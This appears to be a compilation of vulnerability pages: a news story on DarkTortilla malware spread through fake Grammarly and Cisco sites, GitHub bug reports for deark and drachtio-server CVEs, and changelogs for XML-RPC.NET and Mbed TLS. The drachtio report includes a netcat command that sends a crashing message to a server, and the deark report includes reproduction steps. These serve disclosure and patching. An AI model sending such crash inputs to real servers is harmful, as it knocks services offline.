Sites spoofing Grammarly and a Cisco webpage are spreading the DarkTortilla threat, which is filled with follow-on malware attacks.

Researchers have spotted two phishing sites — one spoofing a Cisco webpage and the other masquerading as a Grammarly site — that threat actors are using to distribute a particularly pernicious piece of malware known as "DarkTortilla."

The .NET-based malware can be configured to deliver various payloads and is known for functions that make it extremely stealthy and persistent on the systems it compromises.

Multiple threat groups have been using DarkTortilla since at least 2015 to drop information stealers and remote access Trojans, such as AgentTesla, AsyncRAT and NanoCore. Some ransomware groups too — such as the operators of Babuk — have used DarkTortilla as part of their payload delivery chain. In many of these campaigns, attackers have primarily used malicious file attachments (.zip, .img, .iso) in spam emails to wrap up unsuspecting users in the malware.

**DarkTortilla Delivery Via Phishing Sites**

Recently, researchers at Cyble Research and Intelligence Labs identified a malicious campaign where threat actors are using two phishing sites, masquerading as legitimate sites, to distribute the malware. Cyble surmised that the operators of the campaign are likely using spam email or online ads to distribute links to the two sites.

Users who follow the link to the spoofed Grammarly website end up downloading a malicious file named "GnammanlyInstaller.zip" when they click on the "Get Grammarly" button. The .zip file contains a malicious installer disguised as a Grammarly executable that drops a second, encrypted 32-bit .NET executable. That in turn downloads an encrypted DLL file from an attacker-controlled remote server. The .NET executable decrypts the encrypted DLL file and loads it into the compromised system's memory, where it executes a variety of malicious activities, Cyble said.

The Cisco phishing site meanwhile looks like a download page for Cisco's Secure Client VPN technology. But when a user clicks on the button to "order" the product, they end up downloading a malicious VC++ file from a remote attacker-controlled server instead. The malware triggers a series of actions that end with DarkTortilla installed on the compromised system.

Cyble's analysis of the payload showed the malware packing functions for persistence, process injection, doing antivirus and virtual machine/sandbox checks, displaying fake messages, and communicating with its command-and-control (C2) server and downloading additional payloads from it.

Cyble's researchers found that to ensure persistence on an infected system for instance, DarkTortilla drops a copy of itself into the system's Startup folder and creates Run/Winlogin registry entries. As an additional persistence mechanism, DarkTortilla also creates a new folder named "system\_update.exe" on the infected system and copies itself into the folder.

**Sophisticated & Dangerous Malware**

DarkTortilla's fake message functionality meanwhile basically serves up messages to trick victims into believing the Grammarly or Cisco application they wanted failed to execute because certain dependent application components were not available on their system.

"The DarkTortilla malware is highly sophisticated .NET-based malware that targets users in the wild," Cyble researchers said in a Monday advisory. "The files downloaded from the phishing sites exhibit different infection techniques, indicating that the \[threat actors\] have a sophisticated platform capable of customizing and compiling the binary using various options."

DarkTortilla, as mentioned, often acts as a first-stage loader for additional malware. Researchers from Secureworks' Counter Threat Unit earlier this year identified threat actors using DarkTortilla to mass distribute a wide range of malware including, Remcos, BitRat, WarzoneRat, Snake Keylogger, LokiBot, QuasarRat, NetWire, and DCRat.

They also identified some adversaries using the malware in targeted attacks to deliver Cobalt Strike and Metasploit post-compromise attack kits. At the time, Secureworks said it had counted at least 10,000 unique DarkTortilla samples since it first spotted a threat actor using the malware in an attack targeting a critical Microsoft Exchange remote code execution vulnerability (CVE-2021-34473) last year.

Secureworks assessed DarkTortilla as being very dangerous because of its high degree of configurability and its use of open source tools like CofuserEX and DeepSea to obfuscate its code. The fact that DarkTortilla's main payload is executed entirely in memory is another feature that makes the malware dangerous and difficult to spot, Secureworks noted at the time.

Sophisticated DarkTortilla Malware Serves Imposter Cisco, Grammarly Pages

Deark v.1.6.2 was discovered to contain a stack overflow via the do_prism_read_palette() function at /modules/atari-img.c.

**Description**

A stack-buffer-overflow bug was discovered in function do\_prism\_read\_palette modules/atari-img.c:331

**Version**

Version v1.6.2 (Lastest commit)

**Environment**

Ubuntu 18.04, 64bit

**Reproduce**

Command

    git clone the Lastest Version firstly.
    make && make install
    ./deark -l -zip ./poc
    

POC file at the bottom of this report.

**ASAN Report**

    Module: prismpaint
    =================================================================
    ==20784==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc6490a820 at pc 0x55eae0de20ff bp 0x7ffc6490a390 sp 0x7ffc6490a380
    READ of size 4 at 0x7ffc6490a820 thread T0
        #0 0x55eae0de20fe in do_prism_read_palette modules/atari-img.c:331
        #1 0x55eae0de247e in de_run_prismpaint modules/atari-img.c:361
        #2 0x55eae0fd7023 in de_run_module src/deark-util.c:878
        #3 0x55eae0fd7023 in de_run_module src/deark-util.c:843
        #4 0x55eae1036a35 in de_run src/deark-user.c:452
        #5 0x55eae0dc39e9 in main2 src/deark-cmd.c:988
        #6 0x55eae0dc39e9 in main src/deark-cmd.c:1022
        #7 0x7fd587ac4082 in __libc_start_main ../csu/libc-start.c:308
        #8 0x55eae0dc652d in _start (/AFLplusplus/my_test/deark/backup/asan/deark-master/deark+0xf652d)
    
    Address 0x7ffc6490a820 is located in stack of thread T0 at offset 1056 in frame
        #0 0x55eae0de1c7f in do_prism_read_palette modules/atari-img.c:304
    
      This frame has 2 object(s):
        [32, 1056) 'pal1' (line 308) <== Memory access at offset 1056 overflows this variable
        [1184, 1216) 'tmps' (line 310)
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow modules/atari-img.c:331 in do_prism_read_palette
    Shadow bytes around the buggy address:
      0x10000c9194b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000c9194c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000c9194d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000c9194e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000c9194f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x10000c919500: 00 00 00 00[f2]f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
      0x10000c919510: f2 f2 f2 f2 00 00 00 00 f3 f3 f3 f3 00 00 00 00
      0x10000c919520: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000c919530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000c919540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000c919550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    
    

**POC**

id\_000027,sig\_11,src\_013544+002505,time\_31840218,execs\_68965869,op\_splice,rep\_16.zip

Any issue plz contact with me:  
asteriska001@gmail.com  
OR:  
twitter: @Asteriska8

CVE-2022-43289: A stack-buffer-overflow bug was discovered. · Issue #52 · jsummers/deark

An issue was discovered in drachtio-server before 0.8.20. It allows remote attackers to cause a denial of service (daemon crash) via a long message in a TCP request that leads to std::length_error.

Hi,

the following remote request is able to crash drachtio:

    nc -w 5 PUBLIC_IP 5060 < file
    
    terminate called after throwing an instance of 'std::length_error'
      what():  basic_string::_M_replace_aux
    Aborted
    

A bit of backtrace here:

    terminate called after throwing an instance of 'std::length_error'
      what():  basic_string::_M_replace_aux
    
    Thread 1 "drachtio" received signal SIGABRT, Aborted.
    0x00007ffff6cc9ce1 in raise () from /lib/x86_64-linux-gnu/libc.so.6
    (gdb) bt
    #0  0x00007ffff6cc9ce1 in raise () from /lib/x86_64-linux-gnu/libc.so.6
    #1  0x00007ffff6cb3537 in abort () from /lib/x86_64-linux-gnu/libc.so.6
    #2  0x00007ffff705e7ec in ?? () from /lib/x86_64-linux-gnu/libstdc++.so.6
    #3  0x00007ffff7069966 in ?? () from /lib/x86_64-linux-gnu/libstdc++.so.6
    #4  0x00007ffff70699d1 in std::terminate() () from /lib/x86_64-linux-gnu/libstdc++.so.6
    #5  0x00007ffff7069c65 in __cxa_throw () from /lib/x86_64-linux-gnu/libstdc++.so.6
    #6  0x00007ffff706109a in std::__throw_length_error(char const*) () from /lib/x86_64-linux-gnu/libstdc++.so.6
    #7  0x00007ffff70f82cf in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::_M_replace_aux(unsigned long, unsigned long, unsigned long, char) ()
       from /lib/x86_64-linux-gnu/libstdc++.so.6
    #8  0x00000000004f10f5 in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::resize (__n=<optimized out>, this=0x617000004418)
        at /usr/include/c++/10/bits/basic_string.h:940
    #9  drachtio::StackMsg::appendLine (szLine=<optimized out>, complete=true, this=0x617000004310) at ../src/controller.cpp:276
    #10 drachtio::StackMsg::appendLine (this=0x617000004310, szLine=<optimized out>, complete=<optimized out>) at ../src/controller.cpp:272
    #11 0x00000000004f4230 in (anonymous namespace)::__sofiasip_logger_func(void *, const char *, typedef __va_list_tag __va_list_tag *) (logarg=<optimized out>, 
        fmt=0xc27e40 "%s   ", '-' <repeats 72 times>, "\n", ap=0x7fffffffb4e0) at ../src/controller.cpp:132
    #12 0x00000000009f0304 in su_log (fmt=fmt@entry=0xc27e40 "%s   ", '-' <repeats 72 times>, "\n") at su_log.c:95
    #13 0x0000000000a30504 in tport_log_msg (self=self@entry=0x615000004e00, msg=msg@entry=0x619000011d80, what=what@entry=0xc24480 "recv", via=via@entry=0xc24440 "from", now=...)
        at tport_logging.c:901
    #14 0x0000000000a21d47 in tport_deliver (self=self@entry=0x615000004e00, msg=msg@entry=0x619000011d80, next=next@entry=0x0, sc=<optimized out>, now=...) at tport.c:3081
    #15 0x0000000000a224d0 in tport_parse (self=self@entry=0x615000004e00, complete=0, now=...) at tport.c:3015
    #16 0x0000000000a23ee0 in tport_recv_event (self=0x615000004e00) at tport.c:2954
    #17 0x0000000000a2a2e0 in tport_base_wakeup (self=0x615000004e00, events=1) at tport.c:2855
    #18 0x0000000000a83e3c in su_epoll_port_wait_events (self=0x611000001e40, tout=<optimized out>) at su_epoll_port.c:510
    #19 0x0000000000a82a45 in su_base_port_run (self=0x611000001e40) at su_base_port.c:349
    #20 0x00000000004dc07c in drachtio::DrachtioController::run (this=<optimized out>) at ../src/controller.cpp:1336
    #21 0x00000000004647af in main (argc=9, argv=0x7fffffffe898) at ../src/main.cpp:47
    

    # drachtio -v
    v0.8.20-rc1
    

Attaching the testcase as zipped, but to reproduce you need to unzip. No need to do replacements into the file, but please note that it is a tcp request and not udp like previous bugs.  
length\_error.zip

CVE-2022-47515: terminate called after throwing an instance of 'std::length_error' · Issue #245 · drachtio/drachtio-server

An XML external entity (XXE) injection vulnerability in XML-RPC.NET before 2.5.0 allows remote authenticated users to conduct server-side request forgery (SSRF) attacks, as demonstrated by a pingback.aspx POST request.

**Downloads****Current Production Release**

XML-RPC.NET 2.5.0 is the current production release.

xml-rpc.net.2.5.0.zip      documentation

New features, changes, and fixed issues:

*   Added <i8> to support 64-bit long integer values.
*   Added support for more ISO8601 date formats. AllowNonStandardDateTime flag is now deprecated. The following formats are now accepted by default, with the '-' and ':' separators being optional.
    *   yyyy-mm-ddThh:mm:ss
    *   yyyy-mm-ddThh:mm:ssZ
    *   yyyy-mm-ddThh:mm:ss�hh
    *   yyyy-mm-ddThh:mm:ss�hh:mmNote: the XML-RPC spec describes the format as 19980717T14:08:55.
*   Added AllowAutoRedirect property to IXmlRpcProxy. Default behaviour remains the same (property set to true).
*   Moved to Visual Studio 2008.
*   Discontinued support for .NET 1.0 and 1.1.
*   Fixed issues:
    *   Issue 55 : change XmlRpcProxyGen so that FileIOPermission is not required for calls to Create.
    *   Issue 56: Maintain XML-RPC struct member ordering in XmlRpcStruct after deserialization.
    *   Issue 65: When deserializing request, check that the number of parameters is consistent with the method signature.
    *   Issue 70: Allow structs/classes to have members or arrays of the same type as the parent type.

**Work in Progress**

This is a snapshot of work in progress.

xml-rpc.net.3.0.0.270-snapshot.zip      documentation

**Build 270**

*   More graceful handling of case where illegal XML characters are rejected during serialization and deserialization.
*   Added generic EndInvoke method to XmlRpcClientProtocol so return type can be used for deserialization.
*   Added support for cookie and response headers for Silverlight and Windows Phone.

**Build 266**

*   Support for easier logging of request and response XML.
*   Support for mapping .NET enums to/from XML-RPC string values using XmlRpcEnumMapping attribute.
*   Fixed problem with logging and decompression of response stream.
*   Fixed problem with return type in XmlRpcClientProtocol.EndInvoke.
*   Added unit testing for Silverlight build.
*   Switch to Silverlight 4 only in order to support credentials using ClientHttp stack.
*   Now throws XmlRpcUnsupportedTypeException when a type has an indexer property.

**Build 241**

*   Fixes problem with mapping <nil /> onto type Object.

**Build 238**

*   Support for <nil> XML-RPC extension.
*   Support for Silverlight 3 and 4.
*   Support for Windows Phone 7.
*   .NET enum types can be mapped to/from XML-RPC <i4> and <i8> values. (more)
*   New UseEmptyElementTags property on IXmlRpcProxy. If this is set to true full element tags will be generated, for example <string></string> instead of <string />. The default setting of false for this property results is consistent with previous releases. This new feature provides compatibility with servers implemented with XML-RPC libraries which don't support empty tags, such XMLRPC++.
*   New UseNagleAlgorithm property on IXmlRpcProxy. With its default value of false calls will be quicker where small XML-RPC requests are being sent.
*   Separate client and server assemblies � client assembly compatible with .NET Client Profile.
*   Changed directory structure within distribution zip file to avoid problem when opening the file in Windows Explorer.
*   Moved to Visual Studio 2010.
*   Fixed issues:
    *   Issue 55 : change XmlRpcProxyGen so that FileIOPermission is not required for calls to Create.
    *   Issue 56: Maintain XML-RPC struct member ordering in XmlRpcStruct after deserialization.
    *   Issue 65: When deserializing request, check that the number of parameters is consistent with the method signature.
    *   Issue 70: Allow structs/classes to have members or arrays of the same type as the parent type.
    *   Issue 74: Fixed case where if a proxy call is made with a ResponseEvent assigned, the call crashes with a "Stream Closed" error.
    *   Issue 77: Fixed exception when AllowStringFaultCode is set to true. Now string fault codes are handled as well as integer fault code by default.
    *   Issue 78: XmlRpcServiceInfo.GetXmlRpcType now handles case of NonSerializedAttribute on all types.
    *   Issue 83: Change to prevent internal server error when viewing auto-generated help on Mono based servers.
    *   Issue 86: XmlRpcDocWriter.WriteStruct now writes XmlRpcMember.Description.
    *   Issue 89: Workaround on XmlRpcListenerService for cases where closing the request stream was resulting in an InvalidOperationException.
*   Changes:
    *   Custom nullable types � XmlRpcBoolean, XmlRpcDateTime, XmlRpcDouble, XmlRpcInt � have been discontinued. Use the standard nullable types bool?, DateTime?, double?, int?.
    *   A server implementation now needs to reference the CookComputing.XmlRpcServer assembly in addition to the CookComputing.XmlRpc assembly.
    *   Default value for new UseNagleAlgorithm. By default it was previously always false.

**Older Releases****2.4.0**

xml-rpc.net.2.4.0.zip

New feature and fixed issues:

*   New StructParams property on XmlRpcMethodAttribute which provides supports for APIs which use a struct to provide named parameters to a method call. (more).
*   NonSerialized attribute can be applied to struct members to prevent them being serialized and deserialized. (more).
*   Fixed issues:
    *   Issue 25: NullReferenceException when struct member name is an empty string. Now throws XmlRpcInvalidXmlRpcException.
    *   Issue 26: Auto-Documentation does not work with HttpListener.
    *   Issue 27: XmlRpcListenerService.ProcessRequest may not close stream in case of exception.
    *   Issue 28: XmlRpcSerializer.GetStructName does not check for Properties.
    *   Issue 31: UseIntTag is being ignored.
    *   Issue 32: XmlRpcClientProtocol problem with response from void method.
    *   Issue 34: XmlRpcServerProtocol should be derived from MarshalByRefObject. The system.\* methods do not work with remoting object.
    *   Issue 35: UseEmptyParamsTag property on the proxy doesn�t work unless you are making asynchronous calls.
    *   Issue 36: Fixed SelectSingleNode and using statement in XmlRpcFaultException for Compact Framework version.
    *   Issue 38: Check of ParamArrayAttribute causes crash under Mono/Linux.
    *   Issue 40: Deserialization performance enhancement.

**2.3.2**

xml-rpc.net.2.3.2.zip

Changes:

*   Issue 22: XmlRpcTypeMismatchException thrown if an XML-RPC array is mistakenly mapped onto a .Net struct (was throwing MissingMethodException).
*   Issue 23: Fixes problem where XML-RPC string values containing just one or more spaces were deserialized as an empty .Net string value.
*   Issue 24: XmlRpcV2 assembly is now built with a strong name.

**2.3.1**

xml-rpc.net.2.3.1.zip

Changes:

*   Issue 20: Fixes problem where XML-RPC service implemented as HttpHandler returns 500 server error.
*   Issue 21: Fixes problem with StateNameServer sample which returns fault response because of duplicate XML-RPC method names.

**2.3.0**

xml-rpc.net.2.3.0.zip

New features and changes:

*   Issue 15: Support for accessing response headers and cookies. (more).
*   Issue 17: Support for not sending a params element if no method parameters. (more).
*   Changes:
    *   Issue 16: Content type set before writing to response stream (fixes Mono issue).
    *   Issue 18: Modified proxy code generation so that it verifies - prevents �Operation could destabilize the runtime" problem.
    *   Issue 19: XmlRpcListenerService now sets Content Length header and does not use chunked content by default.

**2.2.0**

xml-rpc.net.2.2.0.zip

New features and changes:

*   Support for using System.Net.HttpListener to implement an XML-RPC server. (more).
*   Allow client to configure that <string> tag is not used for string values. (more).
*   Server configuration using XmlRpcServiceAttribute. (more).
*   Client support for Accept-Encoding - gzip and deflate. (more).
*   Changes:
    *   Fixed null exception if acquiring request stream fails while logging.
    *   Fixed stack overflow in GetXmlRpcType if invalid types such as DBNull passed in.
    *   Fixed handling of params method parameter if it is first parameter of method.
    *   Improved error reporting when processing params parameters.
    *   Throw XmlRpcDupXmlRpcMethodNames if same XML-RPC name applied to two methods.
    *   Handle zero offset timezones when AllowNonStandardDateTime flag set.

**2.1.0**

xml-rpc.net.2.1.0.zip

New features and changes:

*   Add support for proxy interfaces with overloaded methods. (more).
*   Add support for the int?, bool?, double?, and DateTime? nullable types to represent struct member types (.NET 2.0 version). These can be used to support optional struct members of int, boolean, double, and dateTime.iso8601 types. (more).

**2.0.0**

xml-rpc.net.2.0.0.zip

New features and changes:

*   Add generic form of XmlRpcProxyGen.Create() to remove need to cast the result of Create to the relevant interface (v2 assembly only) (more).
*   Add support for XmlRpcNonStandard.AllowInvalidHttpContent to handle HTTP response content which has whitespace before the start of the XML-RPC response (more).
*   Switch from NAnt to MSBuild and now builds a .NET 2.0 assembly as well as a .NET 1.0 assembly. Note that the 1.0 assembly can be used on all versions of the .NET runtime and should be used where backwards compatibility is required. The 2.0 assembly contains enhancements which rely on features of .NET 2.0 such as generics and can only be used on the .NET 2.0 and later versions of the runtime (more).
*   Error handling
    *   Throws XmlRpcInvalidParametersException if the parameters array passed to XmlRpcClientProtocol.Invoke contains more parameters than are defined for the method being invoked.
    *   Throws XmlRpcInvalidXmlRpcException if a struct member is missing its name or value child element or if it has a duplicate name or value child element.
    *   Attempt to serialize type with one or more properties that cannot be serialized to an XML-RPC type now results in the correct exception being thrown: XmlRpcUnsupportedTypeException.
*   Samples:
    *   Modify samples to use IXmlRpcProxy interface.
    *   Fix threading issue in AsyncBettyApplication sample.

**1.0.0**

xml-rpc.net.1.0.0.zip

New features and changes:

*   IXmlRpcProxy interface to simplify setting proxy properties (more).
*   Expect100Continue property on XmlRpcClientProtocol to configure "Expect: 100-continue" header; default is header not sent (more).
    *   Note: default behavior in previous versions of XML-RPC.NET was to send this header.
*   Support for variable number of method parameters using params (more).
*   Configurable client support for server which don't comply with XML-RPC standard:
    *   UseIntTag proxy property to use <int> instead of <i4>.
    *   Support dateTime with all zeroes (e.g. eGroupWare).
    *   Support empty dateTime values.
    *   Support fault code returned as string.
    *   Support for non-standard dateTime formats
    *   Note: default is standard XML-RPC only. Existing code which relies on non-standard behaviour will need to configure the proxy NonStandard property (more).
*   Support for sending cookies with request (thanks to JC Bertin) (more).
*   Changes:
    *   Fix for when passing zero-length byte array as base64 value.
    *   Removed large switch statements to circumvent Microsoft .NET bug when running in version 2.0 of the .NET runtime with medium trust.
    *   Uses invariant DateTimeFormatInfo when parsing dateTime.iso8601 so parsing works in all locales
    *   Check for recursive data structures when serializing.
    *   Fix to allow XmlRpcStruct member to be set more than once.
    *   Prevent types which cannot be serialized from being added to XmlRpcStruct.
    *   Improved error handling for null values when serializing.
    *   Fix to XmlRpcServerFormatterSink suggested by Sean Rohead.
*   Sample code:
    *   Updates on sample blogging interfaces from Sam Schillace and Mikahosi.
    *   Sample code for accessing OpenDHT (thanks to Michel Foucault).

**0.9.2**

xml-rpc.net.0.9.2.zip

*   Fixed parsing struct containing an enum member.
*   Lock around generation of proxy type.
*   When generating proxy from interface now includes methods from base interfaces.
*   Added RequestEvent and ResponseEvent events to XmlRpcClientProtocol.
*   Added XmlRpcLogger class for ease of use of RequestEvent and ResponseEvent events.
*   Adding LoggingEample sample.
*   Support for XmlRpcMissingMapping attribute on properties.
*   Invalid struct elements ignored if mapping action is Ignore.
*   Fixed dateTime issue with Wareki calendar.
*   Fixed problem with serializing void return.
*   Modified call to DeserializeResponse in DeserializeMessage.
*   Handles case when server incorrectly returns fault code as a string.
*   XmlRpcStruct restricted to string keys.

**0.9.1**

xml-rpc.net.0.9.1.zip

*   Distribution includes version of library which runs on .NET Compact Framework.
*   DateTime parsing bug fixed (caused problems in particular with it-IT locale)
*   XmlRpcProxyGen caches generated assemblies to avoid leakage if XmlRpcProxyGen is called multiple times for the same interface.

**0.9.0**

xml-rpc.net.0.9.0.zip

*   XmlRpcServiceAttribute has a new AutoDocumentation property which allows automatic documentation to be switched off.
*   Handles XML-RPC response encodings other than UTF-8.
*   XmlRpcMemberAttribute fixed.
*   XmlRpcClientProtocol has new ProtocolVersion property to allow HTTP v1.0 to be specified.
*   XmlRpcClientProtocol has new KeepAlive property (default is true). With some servers it may be necessary to set this to false when running with the current beta of the 2.0 CLR, for example if you start seeing the "Underlying Connection Was Closed" exception or the second call on a proxy appears to hang.
*   Multi-dimensional arrays handled correctly.
*   dateTime parsing supports "yyyy-MM-ddTHH:mm:ss" to handle blog service providers which return invalid XML-RPC dateTime values in this format.
*   Includes Joe Bork's xmlrpcgen utility to generate source code for proxies.
*   Release runs on version 1.0 of CLR upwards.

**0.8.0**

xml-rpc.net.0.8.0.zip

*   optional struct members
*   The zip file contains a bin directory containing:

*   **CookComputing.XmlRpc.dll**
*   **bettyapp.exe** (A WinForms application which calls the UserLand betty example server.)
*   **asyncbettyapp.exe** (Another WinForms app illustrating how to make async calls.)
*   **mathservice.exe** (A simple XML-RPC service.)
*   **mathapp.exe** (A WinForms application which calls MathService.)

**0.7.1**

xml-rpc.net.0.7.1.zip

*   License change.
*   Fixed problem in XmlRpcServerFormatterSink.cs whereby an exception was thrown if the XML-RPC and .NET method names are different.

**0.7.0**

xml-rpc.net.0.7.0.zip

*   error reporting of parsing errors using parse stack
*   support for async proxy method generation
*   contiuning work on auto-generated documentation
*   params keywords used in XmlRpcClientProtocol.Invoke
*   server method can return void (return empty string in XML-RPC response)
*   proxy method can return void (return value in XML-RPC response discarded)
*   deserializer throws exception if an XML-RPC struct is missing one or more expected members
*   fixed irritating warning when compiling XmlRpcStruct
*   add version of BeginInvoke taking correct params as per docs
*   Close always called on WebResponse
*   fixed usage of XmlRpcClientProtocol Proxy property when used in VS designer (Drew Marsh)
*   fixed handling of response without Content-Length during async calls (Dmitry Jemerov)
*   fixed case when zero-length string in default string value is passed as <value/> (Drew Marsh)
*   The zip file contains a bin directory containing:

*   **CookComputing.XmlRpc.dll**
*   **bettyapp.exe** (A WinForms application which calls the UserLand betty example server.)
*   **asyncbettyapp.exe** (Another WinForms app illustrating how to make async calls.)
*   **mathservice.exe** (A simple XML-RPC service.)
*   **mathapp.exe** (A WinForms application which calls MathService.)

**Limitations of Current Release**

*   Auto-documentation generation not fully implemented.
*   No tracing/logging functionality.

**0.6.0**

xml-rpc.net.0.6.0.zip

*   Fixed UserAgent property of XmlRpcClientProtocol.
*   Added Proxy property to XmlRpcClientProtocol.
*   Default for XML-RPC request XML document is no explicit encoding, i.e. implicitly UTF-8.
*   Added Encoding property to XmlRpcClientProtocol to set explicit encoding on XML-RPC request XML document
*   Can now use interface to define XML-RPC methods. For example can use same interface to implement both server and client. MathService changed to illustrate use of interface.
*   Added XmlRpcProxyGen class to dynamically create a proxy object from an interface, i.e. makes hand-coding of proxies unnecessary in most cases. bettyapp sample changed to illustrate this.
*   Fixed parsing of double type to be culture independent.
*   Fault response XML document now generated in same way as ordinary response, i.e. will be in same format and encoding.

**0.5.5**

xml-rpc.net.0.5.5.zip

*   Added ClientCertificates property to XmlRpcClientProtocol  
    
*   The zip file contains a bin directory containing:

*   **CookComputing.XmlRpc.dll**
*   **bettyapp.exe** (A WinForms application which calls the UserLand betty example server.)
*   **asyncbettyapp.exe** (Another WinForms app illustrating how to make async calls.)
*   **mathservice.exe** (A simple XML-RPC service.)
*   **mathapp.exe** (A WinForms application which calls MathService.)

**Limitations of Current Release  
**

*   Auto-documentation generation not fully implemented.
*   No tracing/logging functionality.

**0.5.4**

xml-rpc.net.0.5.4.zip

*   Added Headers property to XmlRpcClientProtocol.
*   Added XmlRpcMemberAttribute.
*   Modified deserialization of arrays to return more specific array type when all elements are of the same type.

**0.5.3**

xml-rpc.net.0.5.3.zip

*   Fixed problem with deserializing arrays.

**0.5.2**

xml-rpc.net.0.5.2.zip

*   Improved handling of XmlRpcFaultException in server formatter sink..

**0.5.1**

xml-rpc.net.0.5.1.zip

*   Improved handling of XmlRpcFaultException in server formatter sink..

**0.5.0**

xml-rpc.net.0.5.0.zip

*   Interim release containing preliminary code for client and server NET Remoting formatter sinks.
*   A Remoting sample, with assemblies and config files.

**0.4.3**

xml-rpc.net.0.4.3.zip

*   Interim release containing bug fixes, mainly in the serialization/deserialization code.
*   Some restructuring in preparation for some major changes in the 0.5 series of releases.

**0.4.2**

xml-rpc.net.0.4.2.zip

*   Build for .NET RTM.
*   Added preliminary support for Introspection API.

**0.4.1**

xml-rpc.net.0.4.1.zip

*   Major changes to XmlRpcClientProtocol class to support async calls, working but coding not completed.
*   Extra sample - AsyncBettyApp - to illustrate async calls.

**0.4.0**

Initial release for .NET beta 2.

xml-rpc.net.0.4.0.zip

**0.3.0**

Initial release for .NET beta 1.

**Developers**

Lead Developer - Charles Cook.

CVE-2022-47514: XML-RPC.Net - Downloads

An issue was discovered in Mbed TLS before 2.28.2 and 3.x before 3.3.0. There is a potential heap-based buffer overflow and heap-based buffer over-read in DTLS if MBEDTLS_SSL_DTLS_CONNECTION_ID is enabled and MBEDTLS_SSL_CID_IN_LEN_MAX > 2 * MBEDTLS_SSL_CID_OUT_LEN_MAX.

**Description**

This release of Mbed TLS provides bug fixes and minor enhancements. This release includes fixes for security issues.

Mbed TLS 2.28 is a long-time support branch. It will be supported with bug-fixes and security fixes until end of 2024.

**Security Advisories**

There are no security advisories for this release.

**Release Notes**

Security

*   Fix potential heap buffer overread and overwrite in DTLS if  
    MBEDTLS\_SSL\_DTLS\_CONNECTION\_ID is enabled and  
    MBEDTLS\_SSL\_CID\_IN\_LEN\_MAX > 2 \* MBEDTLS\_SSL\_CID\_OUT\_LEN\_MAX.
*   An adversary with access to precise enough information about memory  
    accesses (typically, an untrusted operating system attacking a secure  
    enclave) could recover an RSA private key after observing the victim  
    performing a single private-key operation if the window size used for the  
    exponentiation was 3 or smaller. Found and reported by Zili KOU,  
    Wenjian HE, Sharad Sinha, and Wei ZHANG. See "Cache Side-channel Attacks  
    and Defenses of the Sliding Window Algorithm in TEEs" - Design, Automation  
    and Test in Europe 2023.

Bugfix

*   Fix a long-standing build failure when building x86 PIC code with old  
    gcc (4.x). The code will be slower, but will compile. We do however  
    recommend upgrading to a more recent compiler instead. Fixes #1910.
*   Fix support for little-endian Microblaze when MBEDTLS\_HAVE\_ASM is defined.  
    Contributed by Kazuyuki Kimura to fix #2020.
*   Use double quotes to include private header file psa\_crypto\_cipher.h.  
    Fixes 'file not found with include' error  
    when building with Xcode.
*   Fix handling of broken symlinks when loading certificates using  
    mbedtls\_x509\_crt\_parse\_path(). Instead of returning an error as soon as a  
    broken link is encountered, skip the broken link and continue parsing  
    other certificate files. Contributed by Eduardo Silva in #2602.
*   Fix a compilation error when using CMake with an IAR toolchain.  
    Fixes #5964.
*   Fix bugs and missing dependencies when building and testing  
    configurations with only one encryption type enabled in TLS 1.2.
*   Provide the missing definition of mbedtls\_setbuf() in some configurations  
    with MBEDTLS\_PLATFORM\_C disabled. Fixes #6118, #6196.
*   Fix compilation errors when trying to build with  
    PSA drivers for AEAD (GCM, CCM, Chacha20-Poly1305).
*   Fix memory leak in ssl\_parse\_certificate\_request() caused by  
    mbedtls\_x509\_get\_name() not freeing allocated objects in case of error.  
    Change mbedtls\_x509\_get\_name() to clean up allocated objects on error.
*   Fix checks on PK in check\_config.h for builds with PSA and RSA. This does  
    not change which builds actually work, only moving a link-time error to  
    an early check.
*   Fix ECDSA verification, where it was not always validating the  
    public key. This bug meant that it was possible to verify a  
    signature with an invalid public key, in some cases. Reported by  
    Guido Vranken using Cryptofuzz in #4420.
*   Fix a possible null pointer dereference if a memory allocation fails  
    in TLS PRF code. Reported by Michael Madsen in #6516.
*   Fix a bug in which mbedtls\_x509\_crt\_info() would produce non-printable  
    bytes when parsing certificates containing a binary RFC 4108  
    HardwareModuleName as a Subject Alternative Name extension. Hardware  
    serial numbers are now rendered in hex format. Fixes #6262.
*   Fix bug in error reporting in dh\_genprime.c where upon failure,  
    the error code returned by mbedtls\_mpi\_write\_file() is overwritten  
    and therefore not printed.
*   In the bignum module, operations of the form (-A) - (+A) or (-A) - (-A)  
    with A > 0 created an unintended representation of the value 0 which was  
    not processed correctly by some bignum operations. Fix this. This had no  
    consequence on cryptography code, but might affect applications that call  
    bignum directly and use negative numbers.
*   Fix undefined behavior (typically harmless in practice) of  
    mbedtls\_mpi\_add\_mpi(), mbedtls\_mpi\_add\_abs() and mbedtls\_mpi\_add\_int()  
    when both operands are 0 and the left operand is represented with 0 limbs.
*   Fix undefined behavior (typically harmless in practice) when some bignum  
    functions receive the most negative value of mbedtls\_mpi\_sint. Credit  
    to OSS-Fuzz. Fixes #6597.
